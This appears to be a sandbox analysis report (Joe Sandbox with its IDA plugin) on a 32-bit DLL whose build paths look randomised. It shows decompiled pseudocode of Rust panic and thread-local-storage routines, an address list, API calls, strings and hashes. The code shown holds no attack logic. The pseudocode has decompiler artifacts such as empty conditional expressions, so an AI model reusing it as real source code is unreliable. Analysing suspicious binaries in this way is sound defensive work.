					_v48 = 0;
					_t194 = E6ECCD0F0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6ed1e11c);
					_v144 = 0x6ed1e11c;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6ECCD000(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6ed1e110; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6ECCD380(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6ECE95A0(_t264,  &M6ED0F8F7, 0x46, _t340,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6ed1d044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6ed1d044;
							_t202 = E6ECD2960(_t264, 0x6ed1d044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6ed1d044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6ed1d044;
								_t203 = E6ECD2960(_t264, 0x6ed1d044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6ed1e128; // 0xa40000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6ed1d044;
										_t332 = _t205;
										_t206 =  *0x6ed1d044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6ECD2960(_t264, 0x6ed1d044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6ECE92F0(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6ed1e128, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6ed1e110;
											 *0x6ed1e110 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ecd3290
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6ed1e128 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6ECCC640(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6ECE95A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed0f860, 0x6ed0ff30);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6ECCC4D0(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6ECCC640(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ed1010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6eccdca0;
										_v60 =  &_v100;
										_v56 = 0x6eccdca0;
										_v52 =  &_v148;
										_v48 = E6ECCDCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECCD0F0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t245);
											}
											HeapFree( *0x6ed1e128, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed1e10c);
											_v68 = 0x6ed0fad0;
											_v64 = 1;
											_v152 = 0x6ed1e10c;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECCDD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6ECCD0F0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed1e10c);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6ECCC640(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6ECCDA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed1e11c);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed0f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6ECCD0F0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6ECCD2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6ECCD290(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6ed1d040 = 0;
											_t356 =  *0x6ed1d040;
											if( *0x6ed1d040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ed1017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed0f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ECCD0F0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t235);
											}
											HeapFree( *0x6ed1e128, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}

0x6eccc70c
0x6eccc70f
0x6eccc716
0x6eccc71d
0x6eccc722
0x6eccc727
0x6eccc730
0x6eccc733
0x6eccc739
0x6eccc741
0x6eccc746
0x6eccc748
0x6eccc762
0x6eccc767
0x6eccc76a
0x6eccc76a
0x6eccc76e
0x6eccc771
0x6eccc774
0x6eccc776
0x6eccc7ea
0x6eccc7ed
0x6eccc84a
0x6eccc851
0x6eccc85b
0x6eccc862
0x6eccc869
0x6eccc86d
0x6eccc874
0x6eccc87b
0x6eccc881
0x6eccc884
0x6eccc887
0x6eccc88d
0x6eccc894
0x6eccc897
0x6eccc89e
0x6eccc8a3
0x6eccc8a5
0x6eccc8ac
0x6eccc8b4
0x6eccc8b7
0x6eccc8b9
0x6eccc8bc
0x6eccc8bc
0x6eccc8bf
0x6eccc8c2
0x6eccc8c6
0x6eccc8c8
0x6eccc8ca
0x6eccc8ce
0x6eccc8d0
0x6eccc8d0
0x6eccc8dc
0x6eccc8dc
0x6eccc8ea
0x6eccc8ea
0x00000000
0x6eccc8a5
0x6eccc7f2
0x6eccc7f5
0x6eccc7fc
0x6eccc803
0x6eccc80a
0x6eccc811
0x6eccc815
0x6eccc81c
0x6eccc823
0x6eccc828
0x6eccc82a
0x00000000
0x6eccc830
0x6eccc835
0x6eccc83d
0x6eccc840
0x6eccc842
0x00000000
0x6eccc842
0x6eccc77d
0x6eccc77d
0x6eccc785
0x6eccc78b
0x6eccc795
0x6eccc79c
0x6eccc7a3
0x6eccc7a9
0x6eccc7ac
0x6eccc7af
0x6eccc7b2
0x6eccc7b5
0x6eccc7ba
0x6eccc7bd
0x6eccc7bf
0x6eccc8f3
0x6eccc8f3
0x6eccc8f6
0x6eccc8f8
0x6eccc9cb
0x6eccc9d0
0x6eccc9d3
0x6eccc9d6
0x6ecccbd7
0x00000000
0x6ecccbd7
0x6eccc9dc
0x6eccc9df
0x6ecccbd0
0x00000000
0x6ecccbd0
0x6eccc9e5
0x6eccc9e7
0x00000000
0x00000000
0x6eccc9f0
0x6eccc9f5
0x6eccc9f8
0x6eccc9fb
0x6eccc9fd
0x00000000
0x00000000
0x6eccca03
0x00000000
0x6eccca03
0x6eccc8fe
0x00000000
0x6eccc7c5
0x6eccc7dd
0x6eccc7e2
0x6ecccbfe
0x6ecccbfe
0x6ecccc00
0x6ecccc00
0x6ecccc05
0x6eccc933
0x6eccc933
0x6eccc936
0x6eccc939
0x6eccc940
0x6eccc942
0x6eccc947
0x6eccc947
0x6eccc94d
0x6eccc956
0x6eccca33
0x6eccca33
0x6eccca38
0x6eccca3a
0x6eccca3c
0x6eccca41
0x6eccca41
0x6eccca47
0x6eccca4d
0x6eccca4f
0x6ecccc0f
0x6ecccc14
0x6ecccc16
0x6ecccc26
0x6ecccc2b
0x6ecccc30
0x6ecccc32
0x6ecccc72
0x6ecccc78
0x6ecccc7f
0x6ecccc81
0x6ecccc86
0x6ecccc88
0x6ecccc8f
0x6ecccc92
0x6ecccc97
0x6ecccc97
0x6ecccc9c
0x00000000
0x6ecccc9c
0x6ecccc34
0x6ecccc3e
0x6ecccc43
0x6ecccc45
0x6ecccc45
0x6ecccc48
0x6ecccc4b
0x6ecccc4e
0x6eccccf8
0x6eccccfe
0x6ecccd09
0x6ecccd09
0x6ecccd0e
0x6ecccd0e
0x6ecccd10
0x6ecccd10
0x6ecccd12
0x6ecccd1d
0x6ecccd1d
0x6ecccd22
0x6ecccd22
0x6ecccd2d
0x6ecccd35
0x6ecccd38
0x6ecccd3b
0x6ecccd3b
0x6ecccd3b
0x6eccc901
0x6eccc901
0x6eccc907
0x6eccc90a
0x6eccc90a
0x6eccc910
0x6eccc913
0x6eccc915
0x6eccc923
0x6eccc923
0x6eccc925
0x6eccca0d
0x6eccca10
0x6eccca1e
0x6eccca20
0x00000000
0x00000000
0x6eccca26
0x6eccca29
0x6eccca2b
0x00000000
0x6eccca2b
0x6eccc92b
0x6eccc92e
0x6eccc930
0x00000000
0x6eccc930
0x6ecccd00
0x6ecccd02
0x00000000
0x6ecccd02
0x6ecccc54
0x6ecccc57
0x00000000
0x00000000
0x6ecccc5d
0x6ecccc60
0x00000000
0x00000000
0x6ecccc66
0x6ecccc68
0x00000000
0x6ecccc68
0x6ecccc18
0x6ecccc1d
0x6ecccc1f
0x00000000
0x00000000
0x6ecccc21
0x00000000
0x6eccca55
0x6eccca55
0x6eccca57
0x6eccca5a
0x6ecccca2
0x6ecccca2
0x6ecccca5
0x6ecccca8
0x6ecccca8
0x6eccccab
0x6eccccb1
0x6eccccb8
0x6eccccbf
0x6eccccc5
0x6eccccc7
0x6ecccccd
0x6eccccd0
0x6eccccd6
0x6eccccd6
0x6eccccd0
0x6eccccc7
0x00000000
0x6eccccbf
0x6eccca60
0x6eccca67
0x6eccca6e
0x6eccca6e
0x00000000
0x6eccca6e
0x6eccc95c
0x6eccc95f
0x6eccc961
0x00000000
0x00000000
0x6eccc967
0x6eccc96a
0x6eccc96d
0x6ecccbf6
0x6ecccbfb
0x00000000
0x6ecccbfb
0x6eccc973
0x6eccc979
0x6eccc97e
0x6eccc980
0x6eccc983
0x6eccc98a
0x6eccc98f
0x6eccc992
0x6eccc994
0x6eccc997
0x6eccc999
0x6eccc99b
0x6eccc99e
0x6eccc9a0
0x6eccc9a3
0x6eccc9a3
0x6eccc99e
0x6eccc9a8
0x6eccc9a8
0x6eccc9ab
0x6eccc9ae
0x6eccc8ef
0x6eccc8ef
0x6eccc8f1
0x00000000
0x6eccc9b4
0x6eccc9b4
0x6eccc9b8
0x6eccc9bb
0x6eccc9be
0x6ecccce0
0x6ecccce6
0x6ecccce8
0x6ecccceb
0x6ecccea2
0x6ecccea2
0x6ecccea7
0x6ecccea8
0x6ecccea8
0x6eccca70
0x6eccca77
0x6eccca7e
0x6eccca85
0x6eccca8c
0x6eccca90
0x6eccca97
0x6eccca9e
0x6ecccaa5
0x6ecccaad
0x6ecccab0
0x6ecccab6
0x6ecccab9
0x6ecccabf
0x6ecccac5
0x6ecccacc
0x6ecccad5
0x6ecccadc
0x6ecccae2
0x6ecccae9
0x6ecccaec
0x6ecccafa
0x6ecccb01
0x6ecccb09
0x6ecccb0c
0x6ecccb0e
0x6ecccb11
0x6ecccb14
0x6ecccb1b
0x6ecccb1d
0x6ecccb23
0x6ecccb25
0x6ecccb25
0x6ecccb31
0x6ecccb31
0x6ecccb3f
0x6ecccb3f
0x6ecccb44
0x6ecccb55
0x6ecccb5a
0x6ecccd4b
0x6ecccd5a
0x6ecccd61
0x6ecccd68
0x6ecccd72
0x6ecccd75
0x6ecccd7c
0x6ecccd83
0x6ecccd89
0x6ecccd90
0x6ecccd93
0x6ecccd9a
0x6ecccd9f
0x6ecccda8
0x6ecccdae
0x6ecccdb1
0x00000000
0x00000000
0x6ecccdb8
0x6ecccdc0
0x6ecccdc3
0x6ecccdc5
0x00000000
0x6ecccb60
0x6ecccb63
0x6eccce00
0x6eccce03
0x6eccce05
0x6eccce07
0x6eccce0a
0x6eccce0f
0x6eccce0f
0x6eccce0a
0x6eccce17
0x6eccce1d
0x6eccce23
0x6eccce25
0x6eccce27
0x6eccce2a
0x6eccce2f
0x6eccce2f
0x6eccce2a
0x6eccce39
0x6eccce3f
0x6eccce43
0x6eccce4a
0x6eccce52
0x6eccce59
0x6eccce60
0x6eccce67
0x6eccce6e
0x6eccce72
0x6eccce79
0x6eccce80
0x6eccce88
0x6eccce8b
0x6eccce8e
0x6eccce93
0x6eccce95
0x6eccce95
0x6eccce97
0x6eccce9b
0x6ecccea0
0x00000000
0x6ecccea0
0x6ecccb6b
0x6ecccb71
0x6ecccb73
0x00000000
0x00000000
0x6ecccb7c
0x6ecccb7f
0x6ecccb86
0x6ecccb8d
0x6ecccb94
0x6ecccb9b
0x6ecccba2
0x6ecccbb0
0x00000000
0x00000000
0x6ecccbbb
0x6ecccbbe
0x6ecccbc6
0x6ecccbc8
0x6ecccdc8
0x6ecccdcb
0x6ecccdd2
0x6ecccddb
0x6ecccddd
0x6ecccddf
0x6ecccddf
0x6ecccdeb
0x6ecccdeb
0x6ecccdfb
0x00000000
0x6ecccdfb
0x6ecccb5a
0x6eccccf1
0x00000000
0x6eccccf1
0x6eccc9c4
0x00000000
0x6eccc9c4
0x6eccc9ae
0x6eccc956
0x6eccc7bf

APIs

Part of subcall function 6ECCD000: TlsGetValue.KERNEL32(00000000,00000001,6ECCC746), ref: 6ECCD00B
Part of subcall function 6ECCD000: TlsGetValue.KERNEL32(00000000), ref: 6ECCD043

AcquireSRWLockShared.KERNEL32(6ED1E11C), ref: 6ECCC785
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCC8DC
HeapFree.KERNEL32(00000000,?), ref: 6ECCC8EA
TlsGetValue.KERNEL32(00000000), ref: 6ECCC94D
TlsGetValue.KERNEL32(00000000), ref: 6ECCCA47
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCCB31
HeapFree.KERNEL32(00000000,?), ref: 6ECCCB3F
GetProcessHeap.KERNEL32 ref: 6ECCCC18
HeapAlloc.KERNEL32(00A40000,00000000,00000010), ref: 6ECCCC2B
TlsSetValue.KERNEL32(00000000,00000000,00A40000,00000000,00000010), ref: 6ECCCC9C
HeapFree.KERNEL32(00000000,00000000,00A40000,00000000,00000010), ref: 6ECCCD1D

Strings

cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ECCC74D, 6ECCC7C8
full, xrefs: 6ECCCCF8
already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6ECCCBE1
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECCCC00

Memory Dump Source

Source File: 00000000.00000002.601171889.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.601163946.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601193192.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601219117.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.601225755.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.601231937.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_loaddll32.jbxd

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
API String ID: 2275035175-262129955
Opcode ID: 9c223ed04fe577f2491036b9f1203ffda8451c75e88929fba176c5cad845cc6b
Instruction ID: 87a909733350d9fbd1076e91cd2186660dba27084ea33df4dd1f3540ba06d961
Opcode Fuzzy Hash: 9c223ed04fe577f2491036b9f1203ffda8451c75e88929fba176c5cad845cc6b
Instruction Fuzzy Hash: 401246B0E002198FEB10CFE5C854BDEBBB5BB49704F204569D915AF384EB75A846CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ECCC6D0(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6ECD39A0;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ed101dc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6ed1e120], esi");
				_t193 = E6ECCD000(_t268, 0x6ed101dc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6ECE95A0(_t268,  &M6ED0F8F7, 0x46, _t349,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed0f570;
						_v120 = 0x6ed0f824;
						_v68 = 0x6ed10260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECC2470;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6ECCD0F0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6ed1e128, 0, _t259);
							}
							_t197 = HeapFree( *0x6ed1e128, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ed10224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed0f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6ECCD0F0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6ed1e11c);
					_v144 = 0x6ed1e11c;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6ECCD000(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6ed1e110; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6ECCD380(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6ECE95A0(_t268,  &M6ED0F8F7, 0x46, _t352,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6ed1d044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6ed1d044;
							_t205 = E6ECD2960(_t268, 0x6ed1d044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6ed1d044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6ed1d044;
								_t206 = E6ECD2960(_t268, 0x6ed1d044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6ed1e128; // 0xa40000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6ed1d044;
										_t340 = _t208;
										_t209 =  *0x6ed1d044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6ECD2960(_t268, 0x6ed1d044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6ECE92F0(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
